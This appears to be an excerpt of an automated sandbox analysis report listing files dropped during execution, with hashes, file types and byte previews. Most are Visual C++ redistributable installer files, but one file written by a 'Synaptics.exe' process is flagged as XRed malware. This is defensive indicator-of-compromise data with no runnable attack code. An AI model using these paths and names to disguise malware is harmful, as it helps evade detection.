Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">......</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [..] - .......... ..................Install ........../passive \| /quiet - ..... UI ......... UI ... ........ UI ........../norestart - ..................... UI.../log log.txt - ............. %TEMP% ...

C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\3082\license.rtf

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	10714
Entropy (8bit):	5.122578090102117
Encrypted:	false
SSDEEP:	192:WthGE/9wd8eQF/hJOmQeNrXT77uOlQ+v3AqHqc3wpXGYdjvsk2cwBb2:mhGuhj+ed388Bb2
MD5:	FBF293EE95AFEF818EAF07BB088A1596
SHA1:	BBA1991BA6459C9F19B235C43A9B781A24324606
SHA-256:	1FEC058E374C20CB213F53EB3C44392DDFB2CAA1E04B7120FFD3FA7A296C83E2
SHA-512:	6971F20964EF74B19077EE81F953342DC6D2895A8640EC84855CECCEA5AEB581E6A628BCD3BA97A5D3ACB6CBE7971FDF84EF670BDDF901857C3CD28855212019
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 T\'c9RMINOS DE LA LICENCIA DE SOFTWARE DE MICROSOFT\par..MICROSOFT VISUAL C++ 2019 RUNTIME\par..\b0 Estos t\'e9rminos de licencia constituyen un contrato entre Microsoft Corporation (o, en funci\'f3n de donde resida, una de sus filiales) y usted. Se aplican al software antes mencionado. Los t\'e9rminos tambi\'e9n se aplican a cualquier servicio o actualizaci\'f3n de Microsoft para el software, excepto en la medida que tengan t\'e9rminos diferentes.\par..\b SI USTED CUMPLE CON LOS PRESENTES T\'c9RMINOS DE ESTA LICENCIA, DISPONDR\'c1 DE LOS DERECHOS QUE SE DESCRIBEN A CONTINUACI\'d3N.\par....\pard{\pntext\f2\'B7\tab}{\\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\sa120\

C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\3082\thm.wxl

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3265
Entropy (8bit):	5.0491645049584655
Encrypted:	false
SSDEEP:	48:c5DiTlO/esS6VGhDv4tiUiyRUqzC4U+aD6N3m7xNh1NWNGbPz+9o3PWeKK9K9KfT:uDiTlxouUTiySqyIwz9sgxqvjIk8
MD5:	47F9F8D342C9C22D0C9636BC7362FA8F
SHA1:	3922D1589E284CE76AB39800E2B064F71123C1C5
SHA-256:	9CBB2B312C100B309A1B1495E84E2228B937612885F7A642FBBD67969B632C3A
SHA-512:	E458DF875E9B0622AEBE3C1449868AA6A2826A1F851DB71165A872B2897CF870CCF85046944FF51FFC13BB15E54E9D9424EC36CAF5A2F38CE8B7D6DC0E9B2363
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instalaci.n de [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.Est. seguro de que desea cancelar la operaci.n?</String>.. <String Id="HelpHeader">Ayuda de configuraci.n</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [directory] - instala, repara, desinstala o.. crea una copia local completa del paquete en el directorio. La opci.n predeterminada es la instalaci.n...../passive \| /quiet - muestra una IU m.nima sin solicitudes o no muestra ninguna IU ni.. solicitud. De forma predeterminada, se muestran la IU y todas las solicitudes...../norestart - elimina cualquier intento

C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\BootstrapperApplicationData.xml

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (558), with CRLF line terminators
Category:	dropped
Size (bytes):	13122
Entropy (8bit):	3.729412080010859
Encrypted:	false
SSDEEP:	192:X0sg+QnH5zHqQHG0Hd8Hz7HE06HA0rH3FxF6OxLo3MzLa0LTnDBx7z8NkzzkvQwj:X0sBydLbmnoN10A1TpotVos
MD5:	B51EF22109AEEA9AE5190E9EF67D9476
SHA1:	FDF939DA26A1268CDF0510AA40FBCA614947C9FD
SHA-256:	1031C44505A4D8322C3BFF5BA92AE5E2C84D7041A01537D187726C9D4E862E5F
SHA-512:	27AA0612337B7473C75BA73EFAF606EE1DB13F7F633151ED5BFF7A9BB5A5AF5502EF3597AE0E95F714F5F0D19A2452413BD18E91516E696DED76C277D0BCA238
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.x./.2.0.1.0./.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a.".>..... . .<.W.i.x.B.a.l.C.o.n.d.i.t.i.o.n. .C.o.n.d.i.t.i.o.n.=.".V.e.r.s.i.o.n.N.T. .&.g.t.;.=. .v.6...0. .O.R. .(.V.e.r.s.i.o.n.N.T. .=. .v.5...1. .A.N.D. .S.e.r.v.i.c.e.P.a.c.k.L.e.v.e.l. .&.g.t.;.=. .2.). .O.R. .(.V.e.r.s.i.o.n.N.T. .=. .v.5...2. .A.N.D. .S.e.r.v.i.c.e.P.a.c.k.L.e.v.e.l. .&.g.t.;.=. .1.).". .M.e.s.s.a.g.e.=.".[.W.i.x.B.u.n.d.l.e.N.a.m.e.]. .c.a.n. .o.n.l.y. .b.e. .i.n.s.t.a.l.l.e.d. .o.n. .W.i.n.d.o.w.s. .X.P. .S.P.2. .a.n.d. .n.e.w.e.r. .p.l.a.t.f.o.r.m.s...". ./.>..... . .<.W.i.x.B.u.n.d.l.e.P.r.o.p.e.r.t.i.e.s. .D.i.s.p.l.a.y.N.a.m.e.=.".M.i.c.r.o.s.o.f.t. .V.i.s.u.a.l. .C.+.+. .2.0.1.5.-.2.0.1.9. .R.e.d.i.s.t.r.i.b.u.t.a.b.l.e. .(.x.8.6.). .-. .1.4...2.5...2.8.5.0.8.". .L.o.g.P.

C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\license.rtf

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	9046
Entropy (8bit):	5.157073875669985
Encrypted:	false
SSDEEP:	192:W8lZ1UVDWkgWZTIsvPhghtQ1Qf4lCfnEtHixEGx736wHqItfSpOy2:9T15WZMgAYlOnjt5HLoL2
MD5:	2EABBB391ACB89942396DF5C1CA2BAD8
SHA1:	182A6F93703549290BCDE92920D37BC1DEC712BB
SHA-256:	E3156D170014CED8D17A02B3C4FF63237615E5C2A8983B100A78CB1F881D6F38
SHA-512:	20D656A123A220CD3CA3CCBF61CC58E924B44F1F0A74E70D6850F39CECD101A69BCE73C5ED14018456E022E85B62958F046AA4BD1398AA27303C2E86407C3899
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT SOFTWARE LICENSE TERMS\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 These license terms are an agreement between Microsoft Corporation (or based on where you live, one of its affiliates) and you. They apply to the software named above. The terms also apply to any Microsoft services or updates for the software, except to the extent those have different terms.\par..\b IF YOU COMPLY WITH THESE LICENSE TERMS, YOU HAVE THE RIGHTS BELOW.\par....\pard{\pntext\f2\'B7\tab}{\\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\sa120\sl240\slmult1\tx360 INSTALLATION AND USE RIGHTS. \b0\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-363\

C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\logo.png

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	PNG image data, 64 x 64, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1861
Entropy (8bit):	6.868587546770907
Encrypted:	false
SSDEEP:	24:q36cnTKM/3kTIQiBmYKHeQWalGt1Sj9kYIt1uZ+bYOQe0IChR95aW:qqiTKMPuUBm7eQJGtYJM1uZCVszaW
MD5:	D6BD210F227442B3362493D046CEA233
SHA1:	FF286AC8370FC655AEA0EF35E9CF0BFCB6D698DE
SHA-256:	335A256D4779EC5DCF283D007FB56FD8211BBCAF47DCD70FE60DED6A112744EF
SHA-512:	464AAAB9E08DE610AD34B97D4076E92DC04C2CDC6669F60BFC50F0F9CE5D71C31B8943BD84CEE1A04FB9AB5BBED3442BD41D9CB21A0DD170EA97C463E1CE2B5B
Malicious:	false
Preview:	.PNG........IHDR...@...@.............sRGB.........gAMA......a.....PLTE].q^.r_.r_.s`.s`.s`.ta.ta.ub.ub.vc.vd.vd.vd.we.we.xe.xg.yg yg zh zh"zi"{j#\|i${j$\|n~n.n,.o,.p..q0.r2.s3.t5.x;.x<.y>.z?.\|B.~C.}E..F..F..H..I..J..L..O..P..W..Y..^..a..c..g..i..q..r..}.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................S......pHYs..%...%....^.....tEXtSoftware.Paint.NET v3.5.100.r.....IDATXG..iW.@...EJ.$M...`AEpG..7TpWT@\.."....(..(.._;...di:9.c>q..g....T...._...-....F..+..w.

C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\thm.wxl

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2952
Entropy (8bit):	5.052095286906672
Encrypted:	false
SSDEEP:	48:c5DiTl/+desK19hDUNKwsqq8+JIDxN3mt7NlN1NVvAdMcgLPDHVXK8KTKjKnSnYF:uDiTl/BbTxmup/vrxATd
MD5:	FBFCBC4DACC566A3C426F43CE10907B6
SHA1:	63C45F9A771161740E100FAF710F30EED017D723
SHA-256:	70400F181D00E1769774FF36BCD8B1AB5FBC431418067D31B876D18CC04EF4CE
SHA-512:	063FB6685EE8D2FA57863A74D66A83C819FE848BA3072B6E7D1B4FE397A9B24A1037183BB2FDA776033C0936BE83888A6456AAE947E240521E2AB75D984EE35E
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29" />.... <String Id="Caption">[WixBundleName] Setup</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Are you sure you want to cancel?</String>.. <String Id="HelpHeader">Setup Help</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [directory] - installs, repairs, uninstalls or.. creates a complete local copy of the bundle in directory. Install is the default...../passive \| /quiet - displays minimal UI with no prompts or displays no UI and.. no prompts. By default UI and all prompts are displayed...../norestart - suppress any attempts to restart. By default UI will prompt before restart.../log log.txt - logs to a specific file. B

C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\thm.xml

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	8332
Entropy (8bit):	5.184632608060528
Encrypted:	false
SSDEEP:	96:8L2HdQG+3VzHfz96zYFGaPSWXdhRAmImlqFQKFBiUxn7Ke5A82rkO/pWk3nswP:ZHAzZ/3
MD5:	F62729C6D2540015E072514226C121C7
SHA1:	C1E189D693F41AC2EAFCC363F7890FC0FEA6979C
SHA-256:	F13BAE0EC08C91B4A315BB2D86EE48FADE597E7A5440DCE6F751F98A3A4D6916
SHA-512:	CBBFBFA7E013A2B85B78D71D32FDF65323534816978E7544CA6CEA5286A0F6E8E7E5FFC4C538200211F11B94373D5658732D5D8AA1D01F9CCFDBF20F154F1471
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. Copyright (c) .NET Foundation and contributors. All rights reserved. Licensed under the Microsoft Reciprocal License. See LICENSE.TXT file in the project root for full license information. -->......<Theme xmlns="http://wixtoolset.org/schemas/thmutil/2010">.. <Window Width="485" Height="300" HexStyle="100a0000" FontId="0">#(loc.Caption)</Window>.. <Font Id="0" Height="-12" Weight="500" Foreground="000000" Background="FFFFFF">Segoe UI</Font>.. <Font Id="1" Height="-24" Weight="500" Foreground="000000">Segoe UI</Font>.. <Font Id="2" Height="-22" Weight="500" Foreground="666666">Segoe UI</Font>.. <Font Id="3" Height="-12" Weight="500" Foreground="000000" Background="FFFFFF">Segoe UI</Font>.. <Font Id="4" Height="-12" Weight="500" Foreground="ff0000" Background="FFFFFF" Underline="yes">Segoe UI</Font>.... <Image X="11" Y="11" Width="64" Height="64" ImageFile="logo.png" Visible="yes"/>.. <Text X="80" Y="11" Width="-11" Heig

C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\wixstdba.dll

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	195600
Entropy (8bit):	6.682530937585544
Encrypted:	false
SSDEEP:	3072:OXoiFK6b0k77I+QfaIl191rSJHvlalB+8BHkY6v53EfcUzN0m6I+WxBlnKzeZuqt:OXoQNb++gDrSJdr8BHkPh3wIgnK/IU1a
MD5:	EAB9CAF4277829ABDF6223EC1EFA0EDD
SHA1:	74862ECF349A9BEDD32699F2A7A4E00B4727543D
SHA-256:	A4EFBDB2CE55788FFE92A244CB775EFD475526EF5B61AD78DE2BCDFADDAC7041
SHA-512:	45B15ADE68E0A90EA7300AEB6DCA9BC9E347A63DBA5CE72A635957564D1BDF0B1584A5E34191916498850FC7B3B7ECFBCBFCB246B39DBF59D47F66BC825C6FD2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3..R...R...R..h.N..R..h.L.R..h.M..R.......R.......R.......R...<..R...,..R...R...S..K....R..K....R..N.@..R...R(..R..K....R..Rich.R..................PE..L......Z...........!................d.....................................................@..............................................................D......,.......T...............................@...............X............................text............................... ..`.rdata.............................@..@.data...............................@....gfids..............................@..@.rsrc...............................@..@.reloc..,...........................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~$s7GdySVm.xlsm

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.610853976637159
Encrypted:	false
SSDEEP:	3:iXFQLjLlAWFd:97
MD5:	CA2C2DB316A89F044206082EEB3A366E
SHA1:	B1B7DFF94B991B26093AA29BF3793DDE245412E1
SHA-256:	12393F1035745AD02C149920E37AFFE459CD0448A2AFEE25C1FABA8060758FF7
SHA-512:	66BC8C779431737A3FA00AF7697C299BC473B6FD22D48914986821DA7C0AB90554D32F7F2B471EAB5410F9C0DE7E076F4D6DEDDCCE1948818F7781DAE9EDEBE7
Malicious:	false
Preview:	.user ..e.n.g.i.n.e.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\AppData\Local\Temp\~DF55160416FCA50B03.TMP

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	3.746897789531007
Encrypted:	false
SSDEEP:	192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
MD5:	7426F318A20A187D88A6EC88BBB53BAF
SHA1:	4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
SHA-256:	9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
SHA-512:	EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\._cache_file.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	14412304
Entropy (8bit):	7.995531820003883
Encrypted:	true
SSDEEP:	393216:/d/FlptVYmfr7yBG/4JU4TRjtjUMy4i6kgsY7i:/1PpttD7yBG/QHTJtYMyke9
MD5:	DE34B1C517E0463602624BBC8294C08D
SHA1:	5CE7923FFEA712468C05E7AC376DD9C29EA9F6BE
SHA-256:	AC96016F1511AE3EB5EC9DE04551146FE351B7F97858DCD67163912E2302F5D6
SHA-512:	114BCA1ECD17E419AD617A1A4341E607250BCB02626CDC0670EB60BE734BBAD1F3C84E38F077AF9A32A6B1607B8CE6E4B3641C0FAEFAA779C0FEC0D3AC022DAC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'.u.'.u.'.u.......u.....[.u.....?.u...v.4.u...q.4.u...p...u.....".u....6.u.'.t.v.u...p.l.u....&.u.'..%.u...w.&.u.Rich'.u.........................PE..L......Z.....................v......m.............@..........................p............@..............................................;...............B...0...=.. t..T...................tt......@n..@...................$........................text.............................. ..`.rdata..............................@..@.data...@...........................@....wixburn8...........................@..@.tls................................@....gfids..............................@..@.rsrc....;.......<..................@..@.reloc...=...0...>..................@..B........................................................................................................................................................

C:\Users\user\Documents\GAOBCVIQIJ.xlsm

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	Microsoft Excel 2007+
Category:	dropped
Size (bytes):	18387
Entropy (8bit):	7.523057953697544
Encrypted:	false
SSDEEP:	384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
MD5:	E566FC53051035E1E6FD0ED1823DE0F9
SHA1:	00BC96C48B98676ECD67E81A6F1D7754E4156044
SHA-256:	8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
SHA-512:	A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
Malicious:	false
Preview:	PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-c.{...dT.m.kL]Yj.\|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

C:\Users\user\Documents\~$GAOBCVIQIJ.xlsx

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.610853976637159
Encrypted:	false
SSDEEP:	3:iXFQLjLlAWFd:97
MD5:	CA2C2DB316A89F044206082EEB3A366E
SHA1:	B1B7DFF94B991B26093AA29BF3793DDE245412E1
SHA-256:	12393F1035745AD02C149920E37AFFE459CD0448A2AFEE25C1FABA8060758FF7
SHA-512:	66BC8C779431737A3FA00AF7697C299BC473B6FD22D48914986821DA7C0AB90554D32F7F2B471EAB5410F9C0DE7E076F4D6DEDDCCE1948818F7781DAE9EDEBE7
Malicious:	false
Preview:	.user ..e.n.g.i.n.e.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\Documents\~$cache1

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	771584
Entropy (8bit):	6.636362882247521
Encrypted:	false
SSDEEP:	12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IFr:ansJ39LyjbJkQFMhmC+6GD92
MD5:	B753207B14C635F29B2ABF64F603570A
SHA1:	8A40E828224F22361B09494A556A20DB82FC97B9
SHA-256:	7F16106F3354A65FC749737905B77DF7BBEFA28BF8BBC966DC1F8C53FA4660F2
SHA-512:	0DD32803B95D53BADD33C0C84DF1002451090FF5F74736680E3A53A0BFC0E723EEE7D795626BC10A1FB431DE7E6E276C5A66349EF385A8B92B48425B0BDD036F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\~$cache1, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.....................&....................@.......................... ...................@..............................B...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\concrt140.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	250144
Entropy (8bit):	6.698404457805156
Encrypted:	false
SSDEEP:	6144:emyq0GgZNA2UwM1vfEcgVAtP+9vIaIgVb5C/U0ZXQVSSIuVxND5S912z/VsDBZAu:eAIMogaIgyRZFuVxNkeztu
MD5:	92F00AD0D5283A6A763073E2F1E4EB58
SHA1:	70BCB3C04DDF9A07F4FA65E94FC6997E58606699
SHA-256:	17079A00DA2F4653B85C9B659088DD485BF84C0B3E5E7E80C7612CAF1EF2BEFC
SHA-512:	2A7BA56FF5B8BC7B8E7C2729C9E59E806F91188A594F306D8524B01C3752066709030F206AA1556507A90944A58D53E497F8774F90D8E8B5FBD31EEC6430FFB0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........M.vH,.%H,.%H,.%..G%J,.%AT;%B,.%CC.$M,.%H,.%.,.%CC.$C,.%CC.$O,.%CC.$.,.%CC.$I,.%CCW%I,.%CC.$I,.%RichH,.%........................PE..L...<W.^.........."!.........x......0........0...........................................@A........................0....K..<r.......................... A.......+...;..8............................<..@............p..8............................text............................... ..`.data....4...0...2..................@....idata.......p.......N..............@..@.rsrc................`..............@..@.reloc...+.......,...d..............@..B........................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\msvcp140.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	453920
Entropy (8bit):	6.66950080753057
Encrypted:	false
SSDEEP:	12288:tjBcSw+X+OLM+PBrWHPd9pGDXywWz08oumlBVhUgiW6QR7t5s03Ooc8dHkC2esrG:tjBcSw+1M+PBrWF9IWwWz08ay03Ooc87
MD5:	697220335E5C4B4126AF45F6F8207896
SHA1:	8106F2DD4665AEC0D1C652E29378EF46EA4E5801
SHA-256:	D7446822C53CF6B9E31D5610D838EBF26ED08BF7497A3E022C47FF193CCDE0BE
SHA-512:	B820735E96600A1382D4097A7638F3286335D93032152B8C85E4EA8196439DFE687E1F8309A81F13A43705A323EDA12BD69EFAC50A09048E57498CEDE4924CF0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8"2.\|C\.\|C\.\|C\....~C\.u;.jC\.\|C]..C\.w,]..C\.w,X.wC\.w,_.tC\.w,Y..C\.w,\.}C\.w,..}C\.w,^.}C\.Rich\|C\.................PE..L...AW.^.........."!.....:.......... ........P............................................@A.........................y................................. A.......;...y..8...........................Hx..@...................Tv..@....................text...29.......:.................. ..`.data...t(...P.......>..............@....idata...............V..............@..@.didat..4............j..............@....rsrc................l..............@..@.reloc...;.......<...p..............@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\msvcp140_1.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29472
Entropy (8bit):	6.817865566900363
Encrypted:	false
SSDEEP:	384:YXi/n/o+H/UgljjdJu+9WcU5gWE5d6c+pBj0HRN7ToucyHRN7rP1x4l78Ka:YknwQJVdJu1qqWNL3nKa
MD5:	511F8CF3E1C960B5AA76FDA0B845D246
SHA1:	6BA029A7C545D64C044AAAD93A3DD00702BDF44E
SHA-256:	4874449EE85BCA44BE95DEA5FAD6AC4F0F5456788C928844702CC5ED4935DD83
SHA-512:	5D0F04AD49AC91202254981CB69EE6EEAEF2C89535B5F396D03EB8BC42B786AF6DB1C3763807597DBDD3E13736B70BFBDEF9149EC45190E7DB1E03E62F939EE4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................'!......y....................................................Rich....................PE..L...GW.^.........."!.........................0...............................p...........@A...........................J....@..x....P...............2.. A...`......h...8...............................@............@...............................text............................... ..`.data...H....0......."..............@....idata.......@.......$..............@..@.rsrc........P.....................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\msvcp140_2.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	174064
Entropy (8bit):	6.871923327983383
Encrypted:	false
SSDEEP:	3072:l3ZqbqsS20jBQh6fLPbU7DuJMCIuW4vdzAY9Sx5+9:l3Zq2bQh6fL+CJMpuW4vdEY489
MD5:	57ED07CB2B239D7CF58EF98040A9B4BD
SHA1:	40BE57A54102EA5AF3D3173C8815BDF35761E5F5
SHA-256:	940FF0F7EA7149084533CF81156CAA42A05BB44656164D769DCB299ECF7A350C
SHA-512:	5459FB26218C13BFC8284E446403964D77CF27ABA51A5149FA7CD916C405811F80A93C93B1310044D586CB7C00489E3AFDDC97343CB40D945BAAEB4B80E971F3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
